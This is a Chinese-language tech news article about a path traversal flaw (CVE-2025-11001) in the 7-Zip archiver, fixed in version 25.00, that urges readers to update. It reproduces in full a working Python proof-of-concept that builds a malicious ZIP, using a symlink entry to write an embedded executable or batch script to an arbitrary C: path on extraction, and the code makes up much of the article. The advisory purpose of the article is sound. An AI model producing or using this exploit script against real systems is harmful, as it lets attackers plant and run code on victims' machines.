研究人员公布开源压缩工具7-Zip路径遍历漏洞的PoC 相关攻击可能很快就会增多
早前研究人员公布开源压缩工具 7-Zip 的路径遍历漏洞 ,黑客借助该漏洞可以构造特制的恶意文件诱导用户使用 7-Zip 打开,从而触发漏洞并实现远程代码执行。
这个漏洞早在三个月前发布的 7-Zip v25.00 版中修复,研究人员迟迟没有公布漏洞是因为 7-Zip 不具备自动更新功能,因此漏洞若是提前公布且大量用户未更新的情况下,可能会造成严重的安全威胁。
不过现在已经过去三个月,漏洞被公布的同时,也已经有研究人员在 GitHub 上公布该漏洞的 PoC 概念验证,也就是借助这个概念验证代码可以利用漏洞发起攻击。
因此如果你使用 7-Zip 那么请务必升级到最新版本,按照行业惯例,一旦 PoC 公布那么很快利用漏洞发起的攻击将会呈指数级增长,尤其是 7-Zip 这种不带自动更新的软件,黑客利用率可能还会显著高于其他软件。
当然对于有兴趣的安全研究人员或其他从业人员,也可以通过 PoC 代码来进行测试,学习此类漏洞的利用方法以便未来能够在其他软件审计中带来帮助。
7-Zip v25.00下载地址:https://www.7-zip.org/download.html
概念验证代码:
import argparse import os import time import zipfile def add_dir(z, arcname): if not arcname.endswith('/'): arcname += '/' zi = zipfile.ZipInfo(arcname) zi.date_time = time.localtime(time.time())[:6] zi.create_system = 3 zi.external_attr = (0o040755 << 16) | 0x10 zi.compress_type = zipfile.ZIP_STORED z.writestr(zi, b'') def add_symlink(z, arcname, target): zi = zipfile.ZipInfo(arcname) zi.date_time = time.localtime(time.time())[:6] zi.create_system = 3 zi.external_attr = (0o120777 << 16) zi.compress_type = zipfile.ZIP_STORED z.writestr(zi, target.encode('utf-8')) def add_file_from_disk(z, arcname, src_path): with open(src_path, 'rb') as f: payload = f.read() zi = zipfile.ZipInfo(arcname) zi.date_time = time.localtime(time.time())[:6] zi.create_system = 3 zi.external_attr = (0o100644 << 16) zi.compress_type = zipfile.ZIP_STORED z.writestr(zi, payload) def main(): parser = argparse.ArgumentParser( description="Crafts a zip that exploits CVE-2025-11001." ) parser.add_argument( "--zip-out", "-o", required=True, help="Path to the output ZIP file." ) parser.add_argument( "--symlink-target", "-t", required=True, help="Destination path the symlink points to - specify a \"C:\" path" ) parser.add_argument( "--data-file", "-f", required=True, help="Path to the local file to embed e.g an executable or bat script." ) parser.add_argument( "--dir-name", default="data", help="Top-level directory name inside the ZIP (default: data)." ) parser.add_argument( "--link-name", default="link_in", help="Symlink entry name under the top directory (default: link_in)." ) args = parser.parse_args() top_dir = args.dir_name.rstrip("/") link_entry = f"{top_dir}/{args.link_name}" embedded_name = os.path.basename(args.data_file) file_entry = f"{link_entry}/{embedded_name}" with zipfile.ZipFile(args.zip_out, "w") as z: add_dir(z, top_dir) add_symlink(z, link_entry, args.symlink_target) add_file_from_disk(z, file_entry, args.data_file) print(f"Wrote {args.zip_out}") if __name__ == "__main__": main()
via GitHub
-
免费好用的解压软件有哪些?
在使用电脑时,压缩软件可以说是我们使用频率最高的软件之一了,不管你是从网站上下载东西,还是工作上和他人互传文件,都经常会用到解压与压缩软件,一款好用的压缩软件是十分必要的,下面就来推荐几款好用的解压缩
[广告]赞助链接:
关注数据与安全,洞悉企业级服务市场:https://www.ijiandao.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
关注KnowSafe微信公众号随时掌握互联网精彩
- Google LangExtract让文本结构化变得简单
- 手心输入法更新:自动下载360相关软件是三年前遗留内容
- 高德地图发布轮椅导航使用指南:覆盖全国60个城市
- RisingWave“奇点无限”开发的云原生流式数据库
- 2022 SDC 议题 | Linux 内核漏洞检测与防御
- 2699元起,nova 10 系列正式发布!
- 反勒索软件开发实战篇
- 做程序员要有“疯子精神”,中国开源开放的科创人才要如何培养?
- 百家智库 | 诸子项目:13个项目发布招募并实施
- CentOS 已死,代替品 Rocky Linux 获得重生!
- 百度首批无人网约车开始运营;美团饿了么正式回应:已逐步取消对骑士逐单处罚;Qt 2021 路线图公布|极客头条
- CVE-2021-1732 Microsoft Windows10 本地提权漏 研究及Exploit开发
